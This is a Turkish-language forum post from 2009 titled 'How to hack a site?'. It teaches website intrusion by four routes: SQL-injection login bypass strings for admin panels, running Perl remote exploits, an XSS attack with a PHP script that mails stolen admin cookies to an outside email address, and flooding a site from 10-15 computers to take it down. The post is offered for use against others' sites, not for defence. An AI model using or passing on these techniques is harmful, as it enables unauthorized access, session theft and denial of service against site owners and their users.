Hasan
Admin
Yaş : 28
Kayıt tarihi : 12/01/09
Mesaj Sayısı : 249
Nerden : Kocaeli-Gebze
Rep Puanı: 1249
![Site Nasıl Hacklenir? [ Cevabı içerde ] Vide](https://2img.net/i/fa/vide.gif)
|
 Konu: Site Nasıl Hacklenir? [ Cevabı içerde ] Ptsi Ocak 12, 2009 7:26 pm |
|
|
Sql İnjection Yoluyla
öncelikle hedef sitenin admin paneline ulaşmak istersiniz bunun için çeşitli exploitler vardır admın paneline ulaşmak için sql inj deneyebiliriz.
username: or 1=1--
şifre : or 1=1--
gibi admin paneline böyle şeyler yazarak bir ihtimalde olsa girebilme şansımız vardır daha fazlasını forumda aratarak bulabilirisniz.
Exploit Yoluyla
o sitenin portalına uygun olarak remote gibi bir exploit türü bulduğumuzda bunu perlde çalıştırarak sitede yetki sahibi olabiliriz.perl exploit kullanımı forumda mevcut aratırsanız bulabilirsiniz.eğer geniş bilgi istiyorsanız verebilirim.
Xss Yoluyla
eğer serverda html komutları açık ise admin cookisini çalarak giriş yapabiliriz.yada adminin mailine xss yollayabiliriz.
<?
$cookie = $_GET['data'];
$kime = "gues@netkabus.com";
$konu = "cookie";
mail ($kime,$konu,$cookie);
?>
bu kodu yazarak mesela.yada yönlendirme kodunu yazarakta yönlendirebiliriz siteyi başka bir adrese. xss ile ilgili geniş bilgiyi Buradan öğrenebilirsiniz.ayrıca htmlnin açık olup olmadıgını sitede mesaj yazma kısmına gelip sol alt taraflara bakarsanız oralarda yazar.
Flood Yoluyla
flood yoluyla siteyi yavaşlatabilir yada bir süreliğine kapatabilirisiniz.flood programları sitede mevcut indirerek çalıştırabilirisiniz ama eğer bu uygulamayı 10-15 tane ayrı bilgisarlardan yaparsanız daha etkili olur.
takıldığınız yada sormak istediğiniz yer olursa yazabilirsiniz.
emeğe saygı |
|
